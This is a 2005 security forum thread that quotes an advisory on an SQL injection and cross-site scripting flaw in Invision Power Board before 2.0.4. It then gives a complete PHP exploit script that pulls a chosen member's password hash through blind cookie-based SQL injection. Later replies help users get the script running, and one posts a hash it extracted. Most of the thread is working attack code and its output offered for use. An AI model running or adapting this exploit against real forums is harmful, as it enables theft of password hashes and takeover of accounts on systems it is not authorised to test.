Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 771
Members: 0
Total: 771
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Another Invision Power Board SQL Injection exploit <2.0.4 Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
Another Invision Power Board SQL Injection exploit <2.0.4
PostPosted: Tue May 17, 2005 12:01 am Reply with quote
ColdWinteR
Beginner
Beginner
 
Joined: May 17, 2005
Posts: 1




Quote:
##########################################################
# GulfTech Security Research May 5th, 2005
##########################################################
# Vendor : Invision Power Services
# URL : http://www.invisionboard.com/
# Version : All Versions Prior To 2.0.4
# Risk : Multiple Vulnerabilities
##########################################################

Description:
Invision Power Board (IPB) is a professional forum system that
has been built from the ground up with speed and security in
mind. It is used by a great many people all over the world. All
versions of Invision Power Board are vulnerable to a serious
SQL Injection vulnerability if magic_quotes_gpc is set to off.
An attacker does not have to be logged in, or even have access
or permission to view the forums in order to exploit this
vulnerability. Users should upgrade immediately.



SQL Injection:
I have discovered a serious SQL Injection issue in Invision
Power Board that affects most all versions of Invision Power
Board regardless of most server configurations. Also, because
of the fact that UNION functionality is not needed an attacker
need not worry if the victim is running an up to date version
of MySQL. The vulnerability lies in the way that Invision Board
handles certain types of "login methods". Let us have a look
at the source of 'sources/login.php'

if ( ! $ibforums->member['id'] )
{
$mid = intval($std->my_getcookie('member_id'));
$pid = $std->my_getcookie('pass_hash');

If ($mid and $pid)
{

$DB->query("SELECT * FROM ibf_members WHERE id=$mid AND
password='$pid'");

if ( $member = $DB->fetch_row() )
{
$ibforums->member = $member;
$ibforums->session_id = "";
$std->my_setcookie('session_id','0', -1 );
}
}
}

This particular portion of code is from the IPB 1.* series, but
the vulnerability seems to exists on all versions of IPB (both
the 1.* and 2.* series). Anyway, as we can see from the above
code the variable $mid is properly forced into an integer datatype
and as a result is safe to pass to the query, but what about
$pid? In the above code we see that the value of $pid is returned
from the my_getcookie() function within the FUNC class. Well,
let us have a look at this function to see if $pid is sanitized
within the function itself.

function my_getcookie($name)
{
global $ibforums;

if (isset($_COOKIE[$ibforums->vars['cookie_id'].$name]))
{
return urldecode($_COOKIE[$ibforums->vars['cookie_id'].$name]);
}
else
{
return FALSE;
}
}

In the above code we can see that not only is the data
unsanitized, but the way the urldecode() function is used also
lets an attacker bypass magic_quotes_gpc. Now, back to the
auto_login() function where we want to concentrate on this bit
of code.


$DB->query("SELECT * FROM ibf_members WHERE id=$mid AND password='$pid'");

if ( $member = $DB->fetch_row() )
{
$ibforums->member = $member;
$ibforums->session_id = "";
$std->my_setcookie('session_id','0', -1 );
}


This would be a very easy issue to exploit if visible data was
returned to the browser, but all we will be able to see is a line
in the response header that looks something like this.

Set-Cookie: session_id=0; path=/; domain=example.com

If we see this then we know the query returned true and produced
some results. This is not that easy of an issue to exploit, but
there are a number of ways to successfully take advantage of this
issue. For one an attacker can select member data into an outfile
and use their browser to retrieve that data, or use the MySQL "mid"
function to enumerate each character of the hash one by one until
the entire hash is discovered! In future versions of MySQL issues
like this will be a lot easier to exploit as we will then be able
to "SELECT * FROM `blah` INTO TABLE `foobar`" much like Oracle
database for example. With functionality like that an attacker can
then do things like dump user data into a message to himself. There
is working exploit code for this issue available, but we will not
be releasing it publicly. Users should upgrade as soon as possible,
as this is a fairly dangerous vulnerability.



Cross Site Scripting:
It is possible for an attacker to conduct Cross Site Scripting attacks
in all versions of invision power board prior to the recently released
2.0.4. This vulnerability exists due to data submitted to the "highlite"
parameter not being sanitized properly when displaying search results.
The same issue also exists in "sources/topics.php". The only condition
is that the data sent to the "highlite" parameter must be double hex
encoded data in order to bypass the global sanitation methods.



Solution:
Matthew Mecham addressed these issues in a VERY timely and professional
manner and fixes have been available for some time now.

http://forums.invisionpower.com/index.php?showtopic=168016

All users should upgrade their Invision Power Board installations as
soon as possible, as these vulnerabilities make it fairly easy to grab
sensitive user data including password hashes from the database.


Special Thanks:
GulfTech Security Research team would like to thank Mr. Janek Vind for
working with us in finding creative ways to exploit these issues. You
can visit his website at http://www.waraxe.us Smile


Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00073-05052005


Credits:
James Bercegay of the GulfTech Security Research Team

The following exploit is made available (by "David Wang"):
Code:
<?php
$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
        $idx = 0;
        $found = false;

        while( !($found) ) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
                $cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
                $cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

                /* Query is in effect: SELECT * FROM ibf_members
                                       WHERE id=$id AND password='$pass' OR
id=$target
                                       HAVING id=$target AND
MID(`password`,$i,1)='$letter' */

                $header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
                if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;

                        $hash .= $letter;
                } else {
                        $idx++;
                }
        }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "HEAD $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Cookie: $cookie\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);

                do {
                        $header.= fread($fp, 512);
                } while( !preg_match('/\r\n\r\n$/',$header) );
        }

        return $header;
}
?>

My test result was something like this:
Code:
1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0 Final Hash: 00000000000000000000000000000000

Could somebody successful exploit this? Question
View user's profile Send private message
Re
PostPosted: Wed Jun 01, 2005 10:32 pm Reply with quote
mister
Beginner
Beginner
 
Joined: Jun 02, 2005
Posts: 4




I Have the same result, nobody has information ????
View user's profile Send private message
PostPosted: Wed Jul 06, 2005 1:04 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
 
Joined: Jul 05, 2005
Posts: 18




same result here .
View user's profile Send private message
PostPosted: Wed Jul 06, 2005 2:41 pm Reply with quote
gulftech
Valuable expert
Valuable expert
 
Joined: Apr 20, 2005
Posts: 9




The headers sent by this exploit script are not RFC compliant and confuse virtualhosts. That is why the LWP versions work (LWP Builds the headers for you) and this one does not.
View user's profile Send private message Visit poster's website
PostPosted: Thu Jul 07, 2005 6:49 pm Reply with quote
str0ke
Beginner
Beginner
 
Joined: Jul 07, 2005
Posts: 4




This exploit only works on 1.3.1 Final and below.

/str0ke
View user's profile Send private message Visit poster's website
Re: Another Invision Power Board SQL Injection exploit <2
PostPosted: Sun Sep 18, 2005 8:32 am Reply with quote
nhtu
Beginner
Beginner
 
Joined: Jan 13, 2005
Posts: 2




Code:
<?php
$server = "SERVER";
$port = 80;
$file = "PATH";
?>

My test result was something like this:
Code:
1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0 Final Hash: 00000000000000000000000000000000

Could somebody successful exploit this? Question[/quote]

example:
$server = "www.hack.com";
$port = 80;
$file = "/"; or $file = "/forum/";
View user's profile Send private message
PostPosted: Sun Sep 18, 2005 11:13 am Reply with quote
Unicorn
Regular user
Regular user
 
Joined: Jul 17, 2005
Posts: 14




It works !
http://unicorn.pri.ee/kodeerija.php
1: 3 2: f 3: 1 4: c 5: d 6: 5 7: 7 8: 7 9: 0 10: c 11: c 12: d 13: 9 14: 9 15: 5 16: 7 17: 6 18: 4 19: f 20: d 21: b 22: f 23: 3 24: 5 25: 0 26: 3 27: 0 28: 9 29: 5 30: 5 31: 6 32: a Final Hash: 3f1cd5770ccd995764fdbf350309556a
View user's profile Send private message Visit poster's website
PostPosted: Wed Sep 21, 2005 8:01 am Reply with quote
super
Active user
Active user
 
Joined: Sep 19, 2005
Posts: 30




how can I use this exploit? Sad I don't know Sad
showul I need a perl software for this? please tell me
View user's profile Send private message
PostPosted: Wed Sep 21, 2005 2:03 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




super wrote:
showul I need a perl software for this? please tell me


No, it's just a PHP script. So you need a webserver with PHP.
Then you have to fill in the variables in the script and run it.

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Wed Sep 21, 2005 2:30 pm Reply with quote
super
Active user
Active user
 
Joined: Sep 19, 2005
Posts: 30




ok how could I fill the php? please tell me step by step if possible.
I have no idea about this exploit Sad
View user's profile Send private message
PostPosted: Wed Sep 21, 2005 3:24 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




super wrote:
ok how could I fill the php? please tell me step by step if possible.
I have no idea about this exploit Sad


Just look at the first four rows...

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Thu Sep 22, 2005 4:00 pm Reply with quote
super
Active user
Active user
 
Joined: Sep 19, 2005
Posts: 30




should I need upload this PHP file?if need where I upload it?please show some link where I can upload this PHP file?how can I upload it? Sad
View user's profile Send private message
PostPosted: Fri Sep 23, 2005 2:34 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




Drop it until you know the basics I'd say...
Google ftp-client, sql-injection, php, apache...

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Mon Sep 26, 2005 8:58 pm Reply with quote
super
Active user
Active user
 
Joined: Sep 19, 2005
Posts: 30




ok I upload this php to this server
http://www.geocities.com/mahalanabis1/2.php

now what I need to do?? Sad please help
View user's profile Send private message
PostPosted: Tue Sep 27, 2005 11:26 am Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




The webserver of your webspace does not accept PHP scripts.

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
Another Invision Power Board SQL Injection exploit <2.0.4
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.151 Seconds